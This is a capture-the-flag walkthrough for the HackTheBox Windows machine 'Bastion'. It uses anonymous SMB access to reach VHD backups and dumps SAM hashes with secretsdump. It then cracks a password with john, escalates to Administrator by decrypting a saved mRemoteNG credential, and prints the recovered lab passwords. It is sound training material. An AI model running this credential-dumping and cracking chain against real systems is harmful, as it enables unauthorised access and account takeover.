Bastion

#Windows #Enumeration #VHD #SAM #NRemoteNG

Bastion is an easy-rated difficulty Windows machine from HackTheBox created by L4mpje. This machine isn’t complex, but it has much noise with extra useless information, mainly because it contains a VHD (Virtual Hard Disk). In the current post, my IP is 10.10.14.76, and the target’s IP is 10.129.136.29.

Gather Information

This step is always the same, you have to ping the machine to see if is alive, and then use Nmap to scan all the ports to avoid surprises.

Local Terminal

nmap -p- --open -T5 -v -n 10.129.136.29

Looks like this machine have a lot of interesting stuff, nothing about a website, maybe is hosted in another port. Still we have relevant information, like port 135, 445 and 5985. Maybe we can do something like enter to the machine by SMB

Local Terminal

nmap -sC -sV -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.129.136.29

Yep, we found an http service using the port 5985, not the default port 80. But there is no domain.

Local Terminal

whatweb http://10.129.136.29:5985

Local Terminal

whatweb http://10.129.136.29:47001

Ok, there is nothing related to websites. Looks like one with a vulnerable SMB, so let’s try to get information from that side.

Local Terminal

crackmapexec smb 10.129.136.29

Local Terminal

smbclient -L 10.129.136.29 -N

Always try first with a null session

Local Terminal

smbmap -H 10.129.136.29 -u ‘null’

There is a disk where we can read and write as guest. This is a good opportunity to explore the machine with more details.

Local Terminal

smbclient //10.129.136.29/Backups -N

And we are in, now your terminal called “Term” is “Backups”.

Terminal Backups

get note.txt
exit

Terminal Backups

cat note.txt

We will connect first to the backup target's disk. Login using { user: null // pass: blank }

Local Terminal

net use Z: \\10.129.136.29\Backups
tree Z:\ /f

Weaponization

There are two vhd (Virtual Hard Drive) files, these are interesting and important to review because these are backups of the target machine, this means that are possible files related to passwords. I am using Windows so I need to use different tools. For Linux, click here.

First search for Disk Management, then inside the Disk Manager: Action > Attach VHD

DiskMan: Submit: Z:\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

If we search inside the disk, there is no flag, but we can still make use of the backup with the SAM and SYSTEM files. Go to Z:\ > Windows > System32 > config

Disk Mounted!

Local Terminal Z:\

cd Z:\Windows\System32\config
copy SYSTEM …\Bastion\content
copy SAM …\Bastion\content

After copying the SYSTEM and SAM files to your local machine, now you can return to your system.

Local Terminal

cd …\Bastion\content
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Exploitation

Create a file called data by using vi data and save the captured hashed from the previous command.

Local Terminal

crackmapexec smb 10.129.136.29 -u “Administrator” -H “31d6cfe0d16ae931b73c59d7e0c089c0”

Local Terminal

john --wordlist=/usr/share/wordlists/rockyou.txt data --format=NT

Local Terminal

crackmapexec smb 10.129.136.29 -u ‘L4mpje’ -p ‘bureaulampje’

Local Terminal

ssh L4mpje@10.129.136.29

We are in, now your local command prompt called “Term” is now target user “L4mpje”

Target L4mpje

cd Desktop
dir
type user.txt

Privileges Scalation

Target L4mpje

cd C:\Users\Administrator

First, you have to always check what privileges do you have.

Target L4mpje

whoami /priv

Target L4mpje

whoami /all

Target L4mpje

systeminfo

Target L4mpje

tasklist

Target L4mpje

cd C:\
dir

Target L4mpje

dir “C:\Program Files\”

Or you can use dir PROGRA~1 to go to the first (~1) folder with PROGRA at the start of the name.

Target L4mpje

dir PROGRA~2

There is a folder with a weird name... suspicious. Search for “mRemoteNG exploit” and there is something interesting here ” https://ethicalhackingguru.com/how-to-exploit-remote-connection-managers/“. This page talks about a python script capable to decrypt the password from the log of mRemoteNG called confCons.xml located at C:\Users\<UserName>\AppData\Roaming\mRemoteNG\. You only have to copy the hash and use the tool

Target L4mpje

cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG\
dir

Target L4mpje

type confCons.xml

Save the hash and close the L4mpje Terminal. Hash:

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

Download the tool from https://github.com/kmahyyg/mremoteng-decrypt or open a new terminal, this time called “LocalTerm”

Local Terminal

cd …/Bastion/Content
git clone https://github.com/kmahyyg/mremoteng-decrypt
cd mremoteng-decrypt

Local Terminal

python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

Local Terminal

crackmapexec smb 10.129.136.29 -u ‘Administrator’ -p ‘thXLHM96BeKL0ER2’

Local Terminal

ssh Administrator@10.129.136.29

Now your LocalTerm is the target Administrator.

Target Root

cd Desktop
dir
root.txt

Mount VHS Linux

Important information to know before: Rmmod linux command, Modprobe command linux: used to load modules and Quemu-nbd (apt install qemu-utils): tool used to export a QEMU disk image using NBD Protocol.

asd

Local Terminal

mkdir /mnt/vhd
modprobe nbd                         #Used to load a module to the system
qemu-nbd -r -c /dev/nb0 “/mnt/smb/WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd”
mount /dev/nbd0 /mnt/vhd
cd /mnt/vhd
ll

From here, you can do the same.

PreviousBashed NextCap

Last updated 10 months ago